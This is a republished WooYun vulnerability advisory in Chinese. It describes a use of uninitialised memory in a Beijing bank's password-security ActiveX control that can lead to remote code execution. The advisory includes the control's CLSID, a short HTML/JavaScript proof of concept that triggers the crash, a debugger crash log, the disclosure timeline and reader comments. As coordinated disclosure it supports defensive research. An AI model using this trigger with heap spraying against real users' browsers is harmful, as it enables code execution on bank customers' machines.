某银行密码安全软件存在远程代码执行漏洞

2015年7月18日21:07:08评论390 views字数 228阅读0分45秒阅读模式

摘要

2014-10-24：细节已通知厂商并且等待厂商处理中
2014-10-27：厂商已经确认，细节仅向厂商公开
2014-10-30：细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-12-21：细节向核心白帽子及相关领域专家公开
2014-12-31：细节向普通白帽子公开
2015-01-10：细节向实习白帽子公开
2015-01-20：细节向公众公开

漏洞概要关注数(17) 关注此漏洞

缺陷编号： WooYun-2014-80417

漏洞标题：某银行密码安全软件存在远程代码执行漏洞

漏洞作者：路人甲

提交时间： 2014-10-24 22:46

公开时间： 2015-01-20 22:48

漏洞类型：远程代码执行

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：远程代码执行

3人收藏

漏洞详情

披露状态：

简要描述：

某银行软件应用接口函数调用未做正确初始化，导致调用一个无效的地址，造成任意代码执行。

详细说明：

北京银行密码控件bjcaotp.exe的BjcaUserCtrl.ocx控件的RecoverCertApp函数调用时，内存为正确初始化，导致调用一个无效的地址，在网页中可以通过预先HeapSpary的技术放置恶意的攻击代码，从而可以造成任意代码的执行。

控件下载地址：https://**.**.**.**/bccbpb/downloadBJCA/bjcaotp.exe

Poc:

code 区域

<object id='ooo' classid='CLSID:{F460ADF7-2BCD-4E82-B092-E570F8644638}'></object>
 <script>
 a="A"
 while(a.length<557)
 { a+=a
 }
 fake = ooo.RecoverCertApp(a)
 
 </script>

漏洞证明：

测试环境win7+ie11

安装控件之后，构造webserver，将poc通过浏览器打开

code 区域

Crashinfo
 (efc.ee4): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=006f006c ebx=040c7f78 ecx=031eafe8 edx=0808fcc8 esi=00000000 edi=00000007
 eip=8e000000 esp=0808fca8 ebp=0808fcd4 iopl=0         nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
 8e000000 ??              ???
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:/Windows/system32/BJCAUS~1.OCX - 
 0:018> kb
 ChildEBP RetAddr  Args to Child              
 WARNING: Frame IP not in any known module. Following frames may be wrong.
 0808fca4 02b88d7c 72492e8b 031eafe8 00000000 0x8e000000
 0808fcd4 766eee1c 040c7f78 0808fd20 772737eb BJCAUS_1!DllUnregisterServer+0x57c
 0808fce0 772737eb 040c7f78 7ae468dd 00000000 kernel32!BaseThreadInitThunk+0xe
 0808fd20 772737be 72492e1a 040c7f78 00000000 ntdll!__RtlUserThreadStart+0x70
 0808fd38 00000000 72492e1a 040c7f78 00000000 ntdll!_RtlUserThreadStart+0x1b
 0:018> dd eax
 006f006c  69efb619 282ab981 88000000 0071c6f8
 006f007c  00000000 282ab99f 88000000 00000000
 006f008c  00000000 282ab99d 88000000 00000191
 006f009c  00000cd4 282ab99b 88000000 00000000
 006f00ac  00000000 282ab999 88001df8 00000191
 006f00bc  00000cd4 282ab997 88000000 756a6f14
 006f00cc  00718520 282ab995 88000000 00000000
 006f00dc  00000000 282ab993 88000000 00000000

修复方案：

正确初始化

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：18

确认时间：2014-10-27 10:02

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-10-23 00:22 | zeracker ( 普通白帽子 | Rank:1077 漏洞数:139 | 爱吃小龙虾。)

1

又是第三方...

1# 回复此人
2014-10-23 03:08 | 袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)

0

过几天也来一发可好...

2# 回复此人
2014-10-29 11:11 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:183 | 力不从心)

1

18分怎么办

3# 回复此人
2014-10-31 01:00 | Beep ( 实习白帽子 | Rank:80 漏洞数:5 | 专注PHP漏洞挖掘)

0

18分怎么办

4# 回复此人
2015-01-21 08:35 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

1

求传授，求指导。。。。。。。。。

5# 回复此人
2015-01-21 10:50 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

1

怎么获取控件的CLSID？有源码吗？

6# 回复此人

漏洞概要 关注数(17) 关注此漏洞

缺陷编号： WooYun-2014-80417

漏洞标题： 某银行密码安全软件存在远程代码执行漏洞

相关厂商： XX银行

漏洞作者： 路人甲